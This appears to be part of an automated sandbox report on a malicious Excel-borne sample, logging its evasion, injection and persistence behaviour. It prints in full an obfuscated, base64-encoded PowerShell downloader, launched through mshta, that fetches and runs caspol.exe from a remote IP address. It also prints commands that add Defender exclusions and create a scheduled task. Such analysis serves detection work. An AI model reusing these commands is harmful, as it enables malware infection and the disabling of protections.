                    Source: CA430000.0.drStream path 'Workbook' entropy: 7.99808964338 (max. 8.0)
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 380000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 2360000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 590000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 5A40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 5510000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 6A40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 7A40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeMemory allocated: 1C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeMemory allocated: 2590000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeMemory allocated: 1C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeMemory allocated: 58C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeMemory allocated: 5440000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeMemory allocated: 68C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeMemory allocated: 78C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 2C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 2580000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 2C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 5950000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 6950000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 6A90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: 7A90000 memory reserve | memory write watch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE89273122 rdtsc 5_2_000007FE89273122
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\caspol.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1953Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4594Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6121Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3640Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2363Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2093Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1481
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2143
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2214
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2674
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2402
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1360
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 928
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3932
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3113
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1320
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1322
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1726
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2226
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4785
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.dllJump to dropped file
                    Source: C:\Windows\System32\mshta.exe TID: 3512Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3784Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712Thread sleep count: 6121 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712Thread sleep count: 3640 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3752Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 1960Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 3908Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep count: 2363 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep count: 2093 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2672Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3044Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep count: 1481 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep count: 2143 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2168Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3032Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4064Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 1448Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\taskeng.exe TID: 804Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe TID: 3128Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe TID: 2164Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3516Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3124Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3548Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3676Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1988Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\mshta.exe TID: 3512Thread sleep time: -720000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1996Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3068Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3816Thread sleep count: 3113 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3816Thread sleep count: 1320 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 380Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 3640Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 2140Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2160Thread sleep count: 1322 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2160Thread sleep count: 1726 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3604Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3784Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3952Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3828Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3820Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\caspol.exeThread delayed: delay time: 60000
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\caspol.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE89273122 rdtsc 5_2_000007FE89273122
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 28_2_0040317B mov eax, dword ptr fs:[00000030h]28_2_0040317B
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 28_2_00402B7C GetProcessHeap,HeapAlloc,28_2_00402B7C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory written: C:\Users\user\AppData\Roaming\caspol.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeMemory written: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory written: C:\Users\user\AppData\Roaming\caspol.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOymentJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37A5.tmp" "c:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"Jump to behavior
                    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpDCB9.tmp"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
